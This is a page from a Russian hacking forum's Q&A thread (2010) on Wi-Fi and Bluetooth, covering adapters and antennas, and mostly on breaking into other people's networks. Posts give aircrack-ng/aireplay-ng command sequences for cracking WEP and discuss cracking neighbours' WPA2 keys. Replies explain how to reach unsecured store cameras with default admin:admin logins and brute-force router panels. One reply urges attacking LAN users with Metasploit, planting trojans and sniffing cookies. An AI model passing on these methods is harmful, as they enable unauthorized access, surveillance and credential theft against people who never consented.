FORUM.ANTICHAT.RU

PDA

Смотреть полную версию : [Wi-Fi, BT] Задай вопрос - получи ответ!

Страницы : 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

Life7
15.04.2010, 23:29
Спасибо, какие еще у кого мысли и проедложения? Самое смешное, что кратковременно и как бы случайно удается попасть в инет. Может быть в то время когда сама точка начинает работать?

DiSi
17.04.2010, 13:43
как зная ключ к вайфаю зайти в сеть?
98:16:20:64:31:25:61:08:34:12:85:80:23 ключ

Kastor
17.04.2010, 19:41
ZnikiR, нужна программа CommView for WiFi и адаптер, поддерживаемый ею. Есть конечно и другие сниферы, но этот, как по мне, самый удобный и понятный.
А что тебя интересует в хотспоте? Пролетающие пароли от мыльников и вебмани ты там не увидишь.

DiSi, для начала его надо перевести в ASCII. Если ты при подборе ключа использовал aircrack, то он должен был вывести не только в 16-й системе ключ, но и нормальным текстом. В некоторых прогах для работы с WiFi ключ молжно и так вводить. Я, кстати, попробовал перевести по таблице аски твой ключ, фигня какая то. Используются символы, которых при вводе пароля просто быть не может.

MisOrda
20.04.2010, 19:48
Здравствуйте.

У меня такой вопрос у нас поставили на работе по территории видеокамеры.И я через некоторое время решил просто проверить как они работают и настроил WiFi себя на нетбуке и вот я получил сигнал отличный от 1 видео камеры.Он как я понял не чем не зашифрован и выдал мне IP.Но при этом пакеты от меня отсылается но от камеры не чего не получаю.В чём может быть причина?

4ikotillo
22.04.2010, 02:08
Камеры случайно не trendnet?

FlatL1ne
22.04.2010, 10:22
Читаю ветку, так и не понял.
1. Можно ли снифать трафик WiFi (в инеткафе например), на предмет паролей к мылу, асе и т.д.? Если да то чем?
2. Возможно ли сбрутить пароли к админке роутера WiFi?

trup_slona
22.04.2010, 12:26
1) Есть ключ для вай-фай, все подключается, все пингуется, но в CommView for WiFi пакеты не расшифровываются не понятно почему.. (пишет что не может дешифровать)
2) DHCP на точке не настроен, поэтому попробовал указать IP точки как адрес прокси (при сканировании портов показало что открыт порт 80), ну и порт 80 указал, попробовал зайти на какой-нибудь сайт, а мне ошибка 400 Bad Request Bad filename. И внизу написано micro_httpd (название прокси-сервера). Это из-за чего так? Хозяин точки подключается вручную чтоли? Т.е. точка не постоянно подключена к инету? (Логин и пароль прокси у меня не запрашивал)
3) Чем можно попробовать сбрутить логин и пароль, или хотя бы пароль к роутеру? (дефолтные не подходят)

Kastor
22.04.2010, 18:53
MisOrda, это вобще интересная тема. Я так же попал на беспроводные камеры одного магазина. Их никто не зашифровал, разве что IP не выдавало, но при помощи CommView for WiFi я понял, какие там настройки. Обычно одной камерой дело не обходится. Ставиться точка доступа, настраивается сеть. Потом ставяться беспроводные камеры и настраиваются на эту точку доступа. Ты вероятно подключился к самой АР. Попробуй подключившись к сети, просканировать свой диапазон IP адресов. Если найдешь узлы с открытым 80 портом, то это может быть как точка доступа (ее вебморда), или же камера. Короче, найденные IP вбиваешь в браузер (желательно в IE), и возможно у тебя появится изображение с камеры.

MisOrda
22.04.2010, 19:10
Честно скажу не знаю. Вижу только что антенны маленькие направленные и от TPLINK

MisOrda
22.04.2010, 19:14
Респект. Также можно попросить по всему этому способу описание краткое. И точку словил по офису прошёлся также не защищённая и также выдала IP но пакеты не идут.Если есть статьи и т.д дай пожалуйста ссылку или от Вас ваше описание как что сделать я буду Вам очень благодарен.

Kastor
24.04.2010, 01:49
Ну, собственно описание действий я уже изложил выше.
Вот моя статья про взлом WEP.

http://vr-online.ru/?q=content/vzlom-wep-v-besprovodnoj-seti-803

Там использовался CommView for WiFi. Можешь прочитать ее для ознакомления с программой (с ее помощью сможешь определять адресацию в сети, хотя это тебе кажется не пригодится пока).
Смотри, подключаешься к сети беспроводной. Тебе выдаются сетевые настройки. После этого ты можешь сканировать сеть на предмет иных устройств. Могу посоветовать сканер LanScope.
Его и кучу интересных программ можешь скачать вот здесь

http://lantricks.com/

Он проверит определенный диапазон IP адресов и покажет все найденные устройства. Далее выбираешь то, у которого значится открытый 80-й порт (этот сканер сразу проверяет его, надо только галочку поставить) и его IP адрес вбиваешь в браузер. Если это будет веб интерфейс точки доступа, то пофиг какой браузер. А если это будет камера, то желательно в IE. Дело в том, что при обращении к камере, она сама предложит тебе установить с нее же определенные дрова. Так вот только под IE все это дело работает. Возможно там будет что то по другому, но у меня было так. Если появятся строки для ввода логина и пароля, то можешь попробовать оставить их пустыми (раз и сеть не зашифрована, то возможно лопухнулись и с этими паролями) или связку admin:admin (канает достаточно часто). Если не подходит, ищи мануал к этим камерам и смотри пароль по умолчанию. Если и он не подходит, то значит его сменили.

gni
05.05.2010, 16:02
такой чудной вопрос: имеется адсл модем Zyxel Prestige 600HW
возможно ли из него сделать wifi приемник (ну как обычная вайфай антенка)
ну и как / где почитать об этом

фэнкс

FlatL1ne
06.05.2010, 12:44
Купил Alfa AWUS036H (500 mWt).

1) Как наверняка узнать ее мощность - 500 мВт???
2) Какую направленную антену для нее купить?

beshenuy
06.05.2010, 14:59
Хочу себе поставить вишку вай фай...
1. Какую именно апаратуру надо...
2. Приблизительная цена у твоем городе...
3. Какой Максимальний радиус сигнала вай фай.?
Я нуб в етом...извените за тупие вопроси....

iv.
06.05.2010, 15:53
Набираешь в никсах iwconfig
Будет вывод типа:
wlan1 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=27 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

Tx-Power=27 dBm - то, что тебе надо. В переводе на милливатты соответствует 501.19 mW.

Самую лучшую..

FlatL1ne
06.05.2010, 21:28
Так вот Tx-Power=20 dBm

Как програмно увеличить TX в линуксе???

UPD: разобрался как менять ТХ но больше 20дБм не поставить, вопрос в следуещем может ли альфа быть на 100миливатт???

iv.
06.05.2010, 23:13
Скорее проблема в дровах или ещё чем-то, помню у меня в бактраке так отображалось, а на дебиане всё ок.

nester
07.05.2010, 10:53
Всем привет! Помогите советом - Купил пару лет назад отличную карточку Ubiquity для PCMCIA. Сейчас стандартная проблема – новый ноут. Если прикуплю переходник PCMCIA->Express, работать будет?

franc
09.05.2010, 13:09
Использую внешнюю точку доступа senao EOC-2610.
Хотел поставить airserv-ng, но возникло пару вопросов.
1. Возможно ли поставить, airserv-ng без всего пакета aircrack-ng.
2. Нужен ли компилятор.
На точке считаю килобайты, поэтому хочется поставить с минимальными потерями.

br1tva
09.05.2010, 21:56
Значит завтра на мою wi - fi сеть сменят пароль и я его знать не буду , на данный момент имею доступ к рутару , перейдя по адресу http://192.168.0.1/ попадаю на страничку настройки рутара , имею логин и пасс . Модель рутора D-Link . Собственно вопрос : Возможно ли сделать так чтобы после завтрашней смены паса на точку доступа я мог пользоваться интернетом .
P.S До этого дел с рутаром не имел , поэтому не судите строго . Очень надеюсь на вашу помощь !!!

BrainDeaD
09.05.2010, 22:02
br1tva

нет. твой рутер создаёт как-бы маленькую подсеть для тебя. а влияния на внешнюю сеть он не имеет.

liserginus
10.05.2010, 18:17
дайте направление плиз!!!

Есть открытая точка dwl 2100AP, Wireshark говорит что ходит траффик из очень нужной локалки через эту точку, видим пакетики (типа pr: nbns, source: 192.168.0.160 dest: 192.168.0.255) юзеры ходят в инэт и обращаются к машинкам внутри той же локалки. Подключаюсь к точке, ничего не видно, нмап говорит что нет хостов, арп незапрещен..Фильтрации по макам нет, маки из локалки подсовывали.. временами проявляется еще один скрытый dlink dir300 с тем же ssid. Возможно две точки мостом объединяют два куска сетки, если так то как туда попасть

Nilolai
15.05.2010, 10:14
Всем здрасьте.Проблема в следующем Нокиа79 в квартире находит и цепляется за откритую сеть длинк,а тошиба сателит на чипе атерос видит кучу сетей закрытых а длинка нет.Пробовол подклучать сетевой адаптор на чипе Реалтек и того хуже.Вопрос как сделать что-бы ноут
увидел и подклучился к открiтой сети.Всем спасибо.

П.С.ОС.Виндовос.

n4e/\@
16.05.2010, 19:13
Я наверное не когда не пойму как ломать wifi.
Меняю свой MAC, запускаю airmon-ng start wlan0, airodump смотрю точки, нахожу с WEP-ом, запускаюairodump-ng -c 1 -w wlan --bssid MAC-точки wlan0 дальше пытаюсь нагнать пакеты
aireplay-ng -1 0 -a MAC-точки -h 00:11:22:33:44:55 wlan0 выдает8:36:31 Waiting for beacon frame (BSSID: MAC-точки) on channel 1
18:36:31 Sending Authentication Request (Open System)
18:36:33 Sending Authentication Request (Open System)
18:36:35 Sending Authentication Request (Open System) и так много раз
Пробовал различные типы атак не одна не нагоняет пакеты.
Ладно черт с ним, жду клиента, совершенно случайно через час заходит кто то(последний раз когда пробовал что либо ломать ждал 3-ри дня так не кто и не зашел, после этого забил на взлом месяца на три)
Пакеты потихоньку сами стали нагоняться, запускаю
aircrack-ng -n 64 --bssid MAC-точки wlan-01.cap после 15000 пакетов смог подобрать пароль: 99:99:99:99:99
И что дальше то делать? как подключится с этим паролем?
wpa_gui - даже не показывает сети, wicd - вроде бы подключается но ip-шник не выдает, пробовал поменять MAC на тот который сидит на этой точке, но все равно ip-шник не выдает.
Вобщем в чем моя ошибка почему не один из методов атак не прокатывает( причем пробовал на нескольких точках доступа)?
Что я не так делаю когда подключаюсь? Может еще что посоветуете.

NikolaiR
17.05.2010, 23:09
Какой уровень сигнала показывает в телефоне?Ноутбук находится в том же месте где телефон ловит сеть,или в разных местах?Может просто ноутбуку не хватает сигнала.

Driver23
18.05.2010, 18:08
Господа, приветствую. Сразу извиняюсь если окажется офф-топом, но тема такая: у меня карточка Wi-Fi Netgear WG511T на чипсете atheros (об ее модернизации я отписался здесь http://forum.antichat.ru/threadnav59035-2-10-wg511t.html ), но вопрос несколько не о ней. Дело в том, что я являюсь счастливым (вернее, являлся))) пользователем ubuntu 9.04 и вскрывал сети уровень приема сиглала на которые по данным самой убунты были где-то 7-15 процентов (фейковая ассоциация с точкой проходила, чоп-чоп тоже делался отлично). Вообщем, все было в шоколаде... До тех пор пока я не обновился сначала на версию убунты 9.10, а следом и на 10.04. После чего вай-фай перестал ассоциироваться с точкой и фейковая атака тоже перестала работать. Собственно и вопрос, что делать? делать откат системы? если да, то как? если поменять драйвера, то тоже как? может кто сталкивался с подобной проблемой. ибо мне новые версии убунты не столько важны, сколько важен нормальный вай-фай. Заранее спасибо за помощь

dupD0M
18.05.2010, 21:02
подскажите пожалста какую прогу юзать чтоб скрытые сети показывала и могла их раскодировать???

и еще вопросик!как усилить сигнал на ноуте не покупая внешний!!

.W
20.05.2010, 12:16
Вот и я дошел до wifi))
Итак вопрос, отправил я spoonwep на сетку, все ок, показало кей:

Чем это привести в читабельный вид?

iv.
20.05.2010, 12:28
А чем он нечитабелен? Так и вводи в хексе, без двоеточий обычно.

.W
20.05.2010, 13:33
Спасибо за оперативность, все работает )

.W
20.05.2010, 14:15
Решил поставить подручный софт ( aircrack, spoonwep/wpa) на основную ОСь Убунту 10.04 NR, aircrack стал без проблем, а вот spoonwep вроде стал, но при запуске из консоли "sudo spoonwep"
Выдало это: "/usr/bin/spoonwep: строка 18: java: команда не найдена"
Как решить? Мне без GUI некуда )

iv.
20.05.2010, 18:03
Очевидно стоит установить JRE

Tol
22.05.2010, 00:39
У меня ноут с wi-fi адаптером Atheros AR5007EG c виндой XP И у себтещи дома я ловлю wi-fi сеть WPA-2. Скажите как ломануть эту сетку? А то много бабла через мобилу инет жрет,а мне еще 2 месяца примерно там чалиться).
Просидел с CommViewWiFi и aircrack три дня и ничего!
ПОМОГИТЕ кто нить,обьясните мне далекому как ее взламать?

Tol
22.05.2010, 01:02
Есть комнатная симпатичная антенна,стоит около 15-20 баксов которую подключаешь к роутеру и она удлинняет сигнал! Пишут на 300 метров но это токо в поле))),а в офисах работает хорошо!

А если дальше сигнал надо то есть спец наружные антены направленого действия но за это надзор за частотами может......

Mr_White
26.05.2010, 02:46
реально ли зайти на свой стационарный комп по вай фай ?
знаю пароль вижу компьютер
какой софт заюзать ?

KATYA
26.05.2010, 02:51
Сделай между ними сеть(точно так как будто-бы ты проводом соеденил), или radmin попробуй ( :confused: ).

Mr_White
26.05.2010, 03:23
мост зделать никак..по другому можна както ?

Stopko_0
26.05.2010, 12:22
уточни, что тебе надо сделать? зайти в расшаренные папки или удаленно админить комп? если первое, то расшарь папки и пропиши адрес компа в браузере типа \\192.168.0.2
если второе, то радмин тебе в руки. ну или аналоги.

BrainDeaD
26.05.2010, 12:38
как вариант: ad-hoc соединение + Remote Desktop

kfor
26.05.2010, 13:22
Dame ware , RDP

Mr_White
26.05.2010, 21:25
комп не совсем свой так сказать ;-)

dupD0M
30.05.2010, 12:56
подскажите какие проги юзать что бы по вай-фаю свой инет раздавать ??

nik-semya
31.05.2010, 21:31
Здрасте всем, взломал точку с веп шифрованием и при помощи CommView for WiFi просмотрел мак адреса всех сетевух (их там очень много так как точка относиться к крупному предприятию) и что бы подключиться к этой точке перепробовал почти все маки и подошёл только один....но после подключения возникла проблема- DHCP сервер дал мне IP адрес, всё как положено, но обмена пакетами с сетью нет, вернее есть но в одну сторону и компы я не вижу, в чем может быть проблема, ведь к другим ихним точкам подключаюсь и всё тип топ

Dr.Silent
06.06.2010, 20:56
народ, а можно на хате за бесценнок соорудить WI-FI точку?

Kverter
07.06.2010, 14:17
вобщем такая трабла,имею ось ВТ4 с usb гружуся.....
карточка Atheros AR9285 ......в режим мониторенга переводится пакеты ловит но вот Data пакеты никак ......что для этого нужно??????

Mazda_6
08.06.2010, 20:24
Хочу занятся вардрайвингом)

Вчера нашел сеть открытую ,подкл, нашел маршрутизатор с дефолтовым логином и пасом, сморел оги)
все что смог пока сдеать)

Сеьт эта пропала и теперь есть много запароленных.

Юзай netwoek stumbler
но не пойму что значят
зеленый замок - wep?
красный замок - ?
желтый замок - ?
желтый круг без замка - ?
оранжевый замок - ?
серый замое - ?
вкладка каналы - ?

zserega
10.06.2010, 14:09
Купил ALFA Network AWUS036NH 2000mW подходит ли он к вардрайвингу BACK TRACK 4, BEINI, WIFIWAY

Kastor
10.06.2010, 23:43
За бесценок не получится. Почитай вводные статьи по теме. Тебе как минимум придется потратиться на точку доступа, которая будет выступать аналогом коммутатора, только беспроводного. Или же можно обойтить без нее. Два и больше компьютеров можно соединить в одну сеть которая называется Ad-Hoc. На каждом компьютере необходимо установить по одному беспроводному адаптеру (на ноутах они уже есть встроенные). Вобщем, почитай немного, разберись, а потом если будут вопросы, может помогу разобраться.

Ну, раз ловит какието пакеты, значит ты все правильно сделал. Возможно в сети просто никто не сидит, поэтому из пакетов только служебные летают, а с данными нет. У меня такое тоже было. Если ты собрался WEP зафигачить, то вот тут можно прочитать про нагнетание траффика для сбора data пакетов
http://lex.gs/security/vzlom-wifi-setej-ili-vozdushnaya-trevoga.html
Я сам пробовал, но у меня не получилось. Вот пакет словил нужный, запустил его в сеть, чтобы трафик нагнетать, а трафика все нет. Если у тебя получится, то отпишись пожалуйста.

Mazda_6, я уже давно не использовал NetStumbler, но там кажется цвет кружка зависит от уровня сигнала. Зеленый - сигнал супер, красный - хреновый. А замок просто означает, что сеть запаролена, а чем именно, можно узнать в колонке Encryption. Я чаще использую утилиту с дровами, которая специально шла под мой Atheros 9007g.

Mazda_6
11.06.2010, 20:45
Kastor, спасибо за ответ!

а еще вот такой вопрос:
вот если на вайфай сетку установлен пароль - и ктото хочет подключиться - предоставлятеся ввести wep ключ - это и есть пасс?

почему тогда прога по определению wep'a показывает что ключ хре ссколько знаков - это жде не пароль...

Kastor
13.06.2010, 01:31
Да, походу так и есть. Пароль сообщается избранным, которые и должны работать в этой сети.
А программа наверное только длину ключа и показывает. Такую удобно бы использовать перед взломом, сразу понятно сколько пакетов надо ловить и какие настройки в aircrack ставить. А что за программа?

php_master
14.06.2010, 22:27
Помогите разобраться: При расшифровке ключа WEP после перебора выдало ключ в виде кода, а именно KEY FOUND! ... как его перевести в обычный ASCII ?

EksTasy
15.06.2010, 00:17
никак, пиши без двоеточий

Cthulchu
15.06.2010, 03:53
у тебя значения в хексе, дальше переводи сам:
http://www.asciitable.com/asciifull.gif
http://www.asciitable.com/extend.gif
смею надеяться, копирайты на картинках никого не ебут особо.
ЗЫ
во второй табличке только в десятичке пронумерованы значения после байта. Думаю, перевести АА в десятичку труда не составит. иначе зачем регистрироваться на античате..

iv.
15.06.2010, 04:50
Не нужно переводить в ASCII, т.к. все уважающие себя клиенты для подключения имеют два типа ввода пароля: строка и hex. Нужно просто выбрать соотвествующее (а в стандартном виндовом апплете это по-моему даже автоматически распознавалось).

m@stik@
15.06.2010, 11:23
как пробрутить cap файл с wpa хендшейком с помощью rainbow tables ?
скармаливаю сар и таблицу cowpatty, выдает ошибку....

Kverter
16.06.2010, 11:33
Kastor

у меня ни как не получается провести фейковую аутификацию,и причем клиентов в сети нет(((((

Gin
17.06.2010, 06:18
Взял роутер вот этот http://homesupport.cisco.com/en-us/wireless/lbc/WKUSB54GS/
хотел бы узнать возможно ли его настроить в режиме репитера :? Чтоб усиливать вай-фай сигнал других сетей или нет. Если да, то не сочтите за труд скиньте линку по настройке. С вай-фай дело имел лишь так косвенно, так что полный нуб в этом.

bogdan
26.06.2010, 00:45
Ончень интересно возможно ли подключить 1 копьютер (win) к разным интернет точкам так, чтоб скорость интернета суммировалась?
У меня установлено 3 wifi адаптера, все 3 ловят интернет от разных соседей. Можно ли эти соеденения сложить, для увиличения скорости интернета?

Keltos
26.06.2010, 20:52
Нет.

hargeb
01.07.2010, 10:00
Планируется сделать wi-fi связь между двумя домами (расстояние 100 метров) в сельской местности. Есть два wi-fi адаптера и китайский роутер. Со стандартными 2 dbi антеннами сигнал идет примерно на 30 м. На интернет-аукционе найдены 17dbi круговые антенны 39 см по 200 рублей с доставкой. Вопрос: нормальные ли такие антенны и хватит ли мощности на 100 метров? И если антенны поставить на крышу как будет влиять непогода?

Stopko_0
04.07.2010, 16:56
помоему, чисто теоретически можно. смотри: если у нас линукс-сервер с веб-сервом, фтп и почтой, и с 3 интерфейсами; подключены все 3; мы пускаем трафик с веб-сервера на один интерфейс, почтовик на второй интерфейс, фтп на третий; нагрузка распараллеливается. если делать аналогию с клиентом, мб можно настроить разные порты на разные интерфейсы, например торрент пустить на самый широкий канал, браузер на тот у которого лучший линк с ТД, и так далее?

в комплекте с роутером должен был идти диск с документацией. в ней все должно быть написано. интересно, что я в инете не нашел документации на него *scratch*

http://wifing.ru/upl/wirecalc.swf тебе в помощь. конечно, оборудование не Длинк, но думаю, примерно рассчитать можно.
а непогода будет влиять на сигнал в любом случае, где бы не находились антенны-на крыше или в помещении. другое дело, что антенны могут повредиться из-за ветра и прочих шалостей природы

morita09
05.07.2010, 22:57
У меня БТ3 СД и Wifi adapter Senao USB 362 EXT (Atheros). БТ3 сканер сетей невидет мой адаптер. через менеджер безпроводных сетей захожу пишет что найден новый интерфейс, спрашивает установить ли какойто сканнер и дает выбор драйверов. все предложеные драйвера перепробовал но ничего не работает всеравно. подскажите что делать? спасибо

Gexik
09.07.2010, 01:08
Какой софт для взлома актуален?

glass
09.07.2010, 10:06
Подскажите можно ли с помощью маршрутизатора включеного как репитер посылать пакеты для рассоциации узлов,так как усб адаптер не имеет подключения внешней антенны(((припаяться к плате результата не дало,а надо увеличить дальность действия,буду признателен за любую помощь

BatchPI
09.07.2010, 10:23
Утро доброе. Вопрос: терминалы, через которые денюшки на телефон ложишь и всё такое, как они связоны, по беспроводной связи или всё таки кабелем???

f1ng3r
09.07.2010, 10:50
Насколько мне известно, некоторые работают через gprs модемы (Siemens MC 35i, STODm-1com), антенка в заде терминала подключена именно к нему. Так же есть терминалы которые работаю через 3g модемы.

Stopko_0
10.07.2010, 08:29
если на него поставить соответствующую прошивку ( openWRT например) и использовать соответствующим образом, то это будет эффективнее. а если делать так как ты хочешь, то для этого надо перевести адаптер в режим точки доступа или адхок, но тогда тебе тяжелее будет инжектить фреймы реассоциации.

glass
10.07.2010, 12:38
не подскажешь оптимальную модель маршрутизатора или по каким параметрам смотреть,прошить можно любой?

если можно ссылку на эту тему,а то поиск ничего не дал(((

Wmzer
15.07.2010, 11:25
В общем я что то накрутил тут...
У меня на ноуте есть прога "airgrack-ng-1.0-win" ну я там пошарился и нашел файлик "wzcook", запустил, подождал секунд 10 и мне выбило пароли на Wi-Fi и написало что они типа будут все на C:\wepkeys.txt :confused:

Вот что я там увидел:
ESSID WEP KEY / WPA PMK

TP-LINK_B3A1E0 0000000000000000000000000000000000000000000000000000000000000000
dlink 0000000000000000000000000000000000000000000000000000000000000000
default 41E45F0E25A5B1953267A290CF929E0CF316E2399AD352A2379108FC5E49FCA9
Homelink 5D316C8EC19CABC8F80CB9BAD9E5D712CD4247FD411A9AD1F27C4AEEA08EC059
homel 3132333435000000000000000000000000000000000000000000000000000000
ADSL 0000000000000000000000000000000000000000000000000000000000000000

А именно меня интересует пароль сети "default" - 41E45F0E25A5B1953267A290CF929E0CF316E2399AD352A2379108FC5E49FCA9

что это за формат и как он расшифровывается? :rolleyes:

AndreyQaz
22.07.2010, 12:22
Трабл такой: Виста32, модем TP-LINK WN422G V2 и CommView работать с ним не хочет, т.к. пишет не дров...
Есть ли проги тут https://forum.antichat.ru/thread89865.html способоные работать с этим модемом?

искал и тут и по нету, но так и не нашел ответа, везде были вопросы ЛИБО уже появились или какие-то решения проблемы.

На днях уеду в командировку, а там только закртые сетки, и то хорошо если будут :eek:
Спасибо.

4ikotillo
24.07.2010, 10:39
Под висту вряд ли справитесь без долгих плясок с бубном, а времени, как я заметил, у Вас нету.

Единственный верный и самый быстрый путь решения это покупка(если не имеется) USB флешки минимум на 2 ГБ и установки на неё BackTrack 4.
Правда если Вы его поставите, то Вы все равно будете долго плясать с бубном, поскольку адаптер у Вас сразу не отобразиться в системе.
НО! Дабы облегчить Вашу участь, постараюсь Вам помочь.

Скачать BackTrack 4 быстрее всего отсюда:
http://rutracker.org/forum/viewtopic.php?t=2630375
Как установить его на флешку:
http://www.backtrack-linux.org/tutorials/usb-live-install/

Видео, как это сделать:
http://www.youtube.com/watch?v=O15v3oK1auA

Если Вы все таки сделали вышеуказанное, то я помогу Вам заставить адаптер нормально функционировать. Вот только не знаю будет ли он поддерживать инъекции(взлом сетей).

Источник http://dinthsblog.blogspot.com/2010/04/i-was-fighting-to-run-tp-link-wn422g-v2.html

Что дословно переводится - надо установить программу ndiswrapper, чтобы все заработало. Как её установить... Смотрите в интернете, гуглъ Вам в помощь.

Для справки - TP-LINK WN422G v2 работает на чипсете ar9170usb

Делайте Выводы:
http://www.lan23.ru/forum/showthread.php?t=4616

Я бы на Вашем месте купил Asus WL-167G v2:
http://www.backtrack-linux.org/forums/beginners-forum/26765-tl-wn422g-v2.html

iv.
24.07.2010, 14:24
Is master mode or promiscuous mode supported?
No! NDIS doesn’t support Master/Repeater/Monitor modes. The only modes supported are Ad-Hoc and Managed.
http://sourceforge.net/apps/mediawiki/ndiswrapper/index.php?title=FAQ

Yetisports
24.07.2010, 14:29
Есть у меня ноут с wi-fi адаптером Atheros AR5007EG c виндой XP SP3. И у себя дома я ловлю wi-fi сеть с WEP шифрованием. Скажите какие проги и дрова надо, чтобы ломануть эту сетку?

AndreyQaz
24.07.2010, 17:43
Эге... думаю это самый лучший вариант не хочется последний день тратить на "пробы"... там более потом буду без инета и спросить не у кого.
Спасибо.

Kastor
25.07.2010, 12:46
У меня такой же адаптер и такую же винду использовал я. Вот по этой статье у меня получилось взломать WEP своей домашней экспериментальной сети.
Но он сработает только если сеть будет более-менее нагружена. Иначе придется использовать немного другой метод.
На данном сайте очень много есть информации по теме. Думаю поискав, ты сможешь найти то что тебя интересует.
Появятся вопросы, спрашивай. Попробуем разобраться.

Stopko_0
26.07.2010, 18:56
CommView For Wifi, aircrack-ng (windows version)

смотрим http://ru.wikipedia.org/wiki/DD-WRT
либо http://ru.wikipedia.org/wiki/OpenWRT
внизу ссылка "Список поддерживаемых устройств"
подбираешь себе оптимальный, ищешь в магазинах, покупаешь и пробуешь. хотя я бы не стал так заморачиваться - ведь гарантия того, что все заработает, не 100%

все тот же, что и раньше - aircrack-ng suite, kismet, CommView for Wi-Fi, EDRP

Semby68
29.07.2010, 13:25
ВОТ ССЫЛКА НА Beini - 1.2.1 , ЭТО ДЕЛАЕТ ВСЁ АВТОМАТИЧЕСКИ.БЕЗ ВСЯКИХ КОМАНД В КОНСОЛЕ.И ВЕСИТ 30 / МБ. ЗАЛИВАЕШЬ НА USB , И ПОРЯДОК.
http://forum.aircrack-ng.org/index.php?topic=6115.0
ДА И НА Back-track-4 МОЖНО УСТАНОВИТЬ ПО ЖЕЛАНИЮ.

me4
02.08.2010, 02:26
Подскажите пожалуйста подходит ли для вардрайвинга DWA-126 ? Может кто подскажет как установить этот адаптер в Ubuntu 10.04, при попытках установки пользовался этой инструкцией https://bugs.launchpad.net/ubuntu/+source/linux/+bug/546653/comments/8,установил дрова, но девайс система не видит. Заранее спасибо.

ZavodiJIo
06.08.2010, 17:03
Приехал в Одессу на отдых, тут в квартире мой ноут поймал несколько сетей wifi. Есть ли возможность (эксплойты может быть какие-нибудь) присоединиться к точек доступа с типом шифрования WPA2-PSK ? буду благодарен за любую информацию, ссылки на статьи, софт и прочее. Заранее большое спасибо.

kkt
07.08.2010, 12:52
помогите пожалуйста вытащить пас на wpa2 psk ибо мой словарик мал(
00:14:D1:C3:5D:54, TRENDnet
http://turbobit.net/se15yg0jag8n.html

am@tory
08.08.2010, 20:05
Здравствуйте! Посоветуйте какую USB карточку лучше приобрести для Wardriving'а. Да я читал тему "Список Wi-Fi адаптеров пригодных для Wardrivingа" Но там глаза разбегаются, исходя из вашего опыта дайте совет. Работать она будет в основном из под XP, и изредка Ubuntu.(Идеально было бы, если он мог бы работать еще и в режиме ad-hoc, но можно и обойтись, был у меня zyxel g202 в режиме ad-hoc терял 50% пакетов)
Также прошу посоветовать хороший wifi Маршрутизатор, чтобы в него можно было воткнуть adsl проводок и/или Lan.(в пределах 3.5к) Работаь он должен на 3-4 компа, желательно без перегревов.
Сам не рискую брать первое понравившееся, не хочу потом гуглить с выпученными глазами. Спасибо.

Semby68
09.08.2010, 13:42
Думаю что-это нормальный вариант, я не жалуюсь.
Alfa AWUS036H 1000mW 1W 802.11b/g USB Wireless WiFi network Adapter
вот ссылка , можешь почитать.
http://www.amazon.co.uk/Alfa-AWUS036H-802-11b-Wireless-network/dp/B002WCEWU8

Semby68
09.08.2010, 14:16
Думаю что проще спросить у проживающих по соседству ,ключик это сетки , заплатив за использование .Так как не хватит времени для подбора .
Ну а так вот ссылка на видео по взлому WPA2.
http://www.ruclip.com/video/zJp5LY6vcuc/wifi-hack-wpa2-crack.html

am@tory
10.08.2010, 03:00
Спасибо друг =) я не дождался и поехал купил на своё усмотрение, взял asus wl520gc и wl-167g

DCrypt
13.08.2010, 10:23
Купил вчера wl-167g v3. C кисметом\аиркреком работает?

PRosTo_LEva
13.08.2010, 10:28
Стандартный Wi-Fi адаптер (802.11g) - если провайдер пишет WiFi то следовательно работать будет, но в любом случае только при условии что у тебя есть покрытие)

DCrypt
13.08.2010, 10:32
Что-то я тебя не сильно понял. :D

PRosTo_LEva
13.08.2010, 11:00
Прости. прочёл не верно. Думал ты хотел уточнить сможет ли это устройство работать с твоим провайдером.

Работать с аиркреком должно, для программ такого рода главная необходимость - присутствие в системе вайфай сетевого адаптера.

Нюансы работы конкретно с этим оборудованием мне не известны, но я думаю проблем возникнуть не должно.

Converter
14.08.2010, 00:14
Ребята, никто не может за вознаграждение изготовить блютуз HSP,HFP,A2DP трансмиттер, для связки с мотогарнитурой? По типу такого: http://www.sicom.ru/product/tti/bt.htm , только с поддержкой стерео. Не могу найти готовых изделий, может можно как-то мобилку переделать для ввода внешнего аналогового сигнала?

php_master
14.08.2010, 01:59
Люди, есть такой вопрос, вообщем перехватил WPA-хэш, сбрутил его, получил пароль и подключился к сети, но чтобы пользоваться ресурсами сети такими как Сетевой трекер или сетевой форум необходимы логин и пароль юзера.... Как мне его перехватить или как перехватить куки ???

4ikotillo
15.08.2010, 07:44
Если ты это все проделал с помощью BackTrack, то там есть Metasploit, просканируй юзеров на уязвимости, получи шел, поставь троя. Это все по теории делается так, но мне ни разу в жизни не удавалось.
А чтобы перехватить куки - используй снифер. В BackTrack есть замечательная програмка WiFiZOO, она автоматом ловит cookie и сохраняет. Но она работет только с открытыми сетями, по этому проснифай трафик, сохрание его в cap файле, скорми этот файл под виндой CommView for WIFI, введи ключ сети, дешифруй трафик, и сохрани расшифрованный трафик уже в новый cap файл. Дальше скорми его какому-нибудь сниферу.
Я со снифингом не дружу, по-этому просто скармливал cap файл программе wifiZoo и получал на выходе свежие и ароматные cookie =) Это лучше наверное делать в конце или начале месяца, так вероятнее всего получить логин и пароль, поскольку я даже не знаю как деунтифицировать клиента от провайдера)))

4ikotillo
15.08.2010, 07:53
Ebay тебе в помощь

Может такое?

http://cgi.ebay.com/BLUETOOTH-A2DP-ADAPTER-APPLE-IPOD-TOUCH-SKYPE-HSP-/150477033348?pt=Other_MP3_Player_Accessories#ht_1283wt_1137

tigros
16.08.2010, 00:49
всем прет.
кто может сделат rainbow tab для EESD HOME?
а то никак не могу допереть как ее сгенерировать.

Converter
17.08.2010, 22:32
Думаете не искал? Эти адаптеры, они однонаправленные только, для прослушивания музыки, а мне надо и обратно с гарнитуры отправлять сигнал (с микрофона).
Кроме того, у меня должны быть аналоговые входа/выходы с адаптера, а не цифровая шина.

DCrypt
19.08.2010, 23:29
Завтра привезут:

http://www.technotrade.com.ua/Images/Photo/quantum-parabolic-24.jpg

Годная для вардрайвинга? Подрубать буду к pci DWA-510.

Stopko_0
01.09.2010, 08:43
вот это монстр!! 24дби - это реально монстр. думаю, еще как годная. разве что не мобильная xD, к ноуту не подрубишь.
ну как, хорошо работает? напиши отзыв плз, очень интересно.

